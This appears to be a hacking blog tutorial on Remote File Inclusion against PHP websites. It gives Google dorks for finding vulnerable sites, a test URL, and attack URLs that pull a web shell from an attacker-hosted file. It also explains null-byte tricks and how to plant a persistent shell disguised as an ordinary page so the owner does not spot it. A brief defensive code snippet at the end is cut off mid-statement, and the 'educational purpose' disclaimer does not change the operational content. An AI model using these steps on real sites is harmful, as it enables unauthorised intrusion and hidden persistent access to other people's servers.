RFI (Remote File Inclusion)

NOTE: Hacking is a illegal activity so don't try on anyone. this tutorial is Only for educational purpose.  If you want to use this tutorial for miscellaneous purpose please stop reading.

RFI (Remote File Inclusion)

Denial of Service (DoS) .

Attacks such as cross site scripting (XSS).

Code execution on the web server

Step 1 : To find a Vulnerable site which is Vulnerable For this You will have to use google dorks Some of the dorks are like this

inurl:/index.php?show=

inurl:/index.php?pg=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?site=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

Step 2: To find the Vulnerability of a given website After getting the website list in google search, we will have to test the Vulnerability of a website. In order to understand better I will be giving u an example www.targetsite.com Now we have to add the following keywords to it

"index.php?page=www.google.com” (Without Quotes)

And it will become like this

www.targetsite.com/index.php?page=http://www.google.com

Hit Enter, If the executed page will direct us to google homepage, then we can say that the website is vulnerable to attack.

Step 3: Exploitation of the Vulnerability. After this we will have to upload the shell to the target website. For this we have to take few things into consideration , the shell must be in .txt format (shell.txt) like Locus. You can see the shell page and download shells from www.sh3ll.org . Once we have the shell, we will have to upload it to and free hosting service and the shell page after uploading becomes like this

www.yourwebsite.com/shell.txt

After this we will have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site

www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt

Sometimes we will have to use null bytes for it to execute in a successful way. If we receive an error from "shell.txt" then for this we will have to try "shell.txt?".

If you have a web shell on the site, but want to make sure you still have access if the owner changes the php script you could upload your shell to their site. Save the text file to your computer and rename it from .txt to .php then simply upload it using the shell you already have on the site

www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt

But be sure to name it something that is less obvious to the site owner than shell.php so that it looks like it is part of the site. Look around at the names of the rest of the pages.

Protect your website

Want to still use the index.php?file= but make sure your site isn't vulnerable to RFI? No problem, just use the "switch" statement (like this site uses) that defines the pages before hand. The code is shown below:

< ?php

$page = $_GET['page'];

switch($page){

case "page1":

include("page1.php");

break;

case "page2":

include("page2.php");

Legal Disclaimer : This tutorial is completely for educational purpose only. For any misuse of this tutorial by any means the author will not be held responsible.  

If you have any queries Please comment my posts.